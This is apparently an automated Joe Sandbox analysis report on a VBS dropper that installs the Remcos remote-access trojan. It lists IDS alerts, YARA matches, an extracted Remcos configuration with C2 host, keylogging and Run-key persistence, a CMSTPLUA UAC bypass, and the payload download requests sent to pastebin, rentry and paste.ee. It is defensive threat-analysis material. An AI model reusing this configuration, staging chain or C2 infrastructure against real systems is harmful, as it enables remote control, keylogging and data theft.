                    2024-10-31T07:43:09.861260+010020327761Malware Command and Control Activity Detected192.168.2.450093181.236.112.1692001TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T07:41:21.752336+010028582951A Network Trojan was detected188.114.97.3443192.168.2.449736TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-31T07:41:19.134483+010028410751Malware Command and Control Activity Detected192.168.2.449736188.114.97.3443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["sost.duckdns.org:2001:0"], "Assigned name": "NewssTar", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T0UVJ0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                    Multi AV Scanner detection for submitted file
                    Source: asegurar.vbsReversingLabs: Detection: 15%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_004338C8
                    Source: powershell.exe, 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_63aeaf56-9

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00407538 _wcslen,CoGetObject,8_2_00407538
                    Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00407877 FindFirstFileW,FindNextFileW,8_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407CD2

                    Software Vulnerabilities

                    barindex
                    Suspicious execution chain found
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFD9B97D896h3_2_00007FFD9B97D7F8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFD9B97AD43h3_2_00007FFD9B97ACD5

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49741 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49747 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49758 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49755 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49762 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49750 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49746 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49749 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49745 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49751 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49744 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49766 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49761 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49752 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49759 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49756 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49753 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49764 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49754 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49748 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49777 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49783 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49760 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49743 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49742 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49794 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49805 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49816 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49824 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49844 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49853 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49861 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49757 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49872 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49881 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49889 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49899 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49910 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49917 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49833 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49940 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49951 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49957 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49965 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49974 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49980 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49989 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50003 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50009 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49997 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50018 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50032 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50026 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50038 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50044 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50051 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50064 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50070 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50073 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50058 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50074 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50075 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50080 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50083 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50086 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50076 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50078 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50077 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50091 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50079 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50072 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50092 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50087 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50067 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50081 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50090 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50085 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50088 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50069 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50084 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50089 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50082 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50093 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49923 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49934 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50068 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50071 -> 181.236.112.169:2001
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 188.114.97.3:443 -> 192.168.2.4:49736
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 188.114.97.3:443 -> 192.168.2.4:49736
                    Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 188.114.97.3:443 -> 192.168.2.4:49736
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: sost.duckdns.org
                    Connects to a pastebin service (likely for C&C)
                    Source: unknownDNS query: name: pastebin.com
                    Source: unknownDNS query: name: paste.ee
                    Potential dropper URLs found in powershell memory
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmpString found in memory: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: sost.duckdns.org
                    Uses ping.exe to check the status of other devices and networks
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49741 -> 181.236.112.169:2001
                    Source: global trafficHTTP traffic detected: GET /raw/4B83LcVU HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /shqm6g9p/raw HTTP/1.1Host: rentry.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/Rrk2f/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                    Source: Joe Sandbox ViewIP Address: 164.132.58.105 164.132.58.105
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: COLOMBIATELECOMUNICACIONESSAESPCO COLOMBIATELECOMUNICACIONESSAESPCO
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49736 -> 188.114.97.3:443
                    Source: global trafficHTTP traffic detected: GET /raw/J6uRjZrv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /vsm4ofxs/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00404B96 WaitForSingleObject,SetEvent,recv,8_2_00404B96
                    Source: global trafficHTTP traffic detected: GET /raw/J6uRjZrv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /vsm4ofxs/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /raw/4B83LcVU HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /shqm6g9p/raw HTTP/1.1Host: rentry.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/Rrk2f/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: pastebin.com
                    Source: global trafficDNS traffic detected: DNS query: rentry.org
                    Source: global trafficDNS traffic detected: DNS query: paste.ee
                    Source: global trafficDNS traffic detected: DNS query: sost.duckdns.org
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PASTE.EE/D/RRK2F/0
                    Source: AddInProcess32.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.00000201819E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.00000201901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026026B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260271BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                    Source: powershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020181950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rentry.org
